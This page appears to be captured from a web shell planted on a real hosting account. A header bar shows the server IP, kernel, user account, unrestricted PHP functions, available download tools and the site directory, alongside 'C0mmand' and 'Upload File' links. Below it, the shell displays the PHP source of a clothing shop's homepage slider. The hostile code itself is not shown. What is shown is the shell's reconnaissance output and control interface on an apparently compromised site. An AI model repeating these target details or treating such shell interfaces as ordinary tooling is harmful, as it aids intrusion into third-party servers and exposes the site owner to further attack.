Server IP : 103.53.40.154 / Your IP : 3.137.175.80 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/aanuwoolenenterprises.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<section class="hero-section"> <div class="hero-items owl-carousel"> <?php $sqlsl = "SELECT * FROM `tbl_slider`"; $runsl = mysqli_query($db,$sqlsl) or die("Query Not run"); while($datasl = mysqli_fetch_assoc($runsl)){ ?> <div class="single-hero-items set-bg" data-setbg="<?php echo $wspath?>admin/images/<?php echo $datasl['image']?>"> <div class="container"> <div class="row"> <div class="col-lg-5"> <span></span> <h1><?php echo $datasl['title']?></h1> <p><?php echo $datasl['line']?></p> <a href="<?php echo $wspath?>shop.php" class="primary-btn">Shop Now</a> </div> </div> <!--<div class="off-card">--> <!-- <h2>Sale <span>50%</span></h2>--> <!--</div>--> </div> </div> <?php }?> <!--<div class="single-hero-items set-bg" data-setbg="img/hero-1.jpg">--> <!-- <div class="container">--> <!-- <div class="row">--> <!-- <div class="col-lg-5">--> <!-- <span></span>--> <!-- <h1>Premium Made in India Products</h1>--> <!-- <p>Women's Woolen Clothings</p>--> <!-- <a href="shop.php" class="primary-btn">Shop Now</a>--> <!-- </div>--> <!-- </div>--> <!-- <div class="off-card">--> <!-- <h2>Sale <span>50%</span></h2>--> <!-- </div>--> <!-- </div>--> <!--</div>--> </div> </section>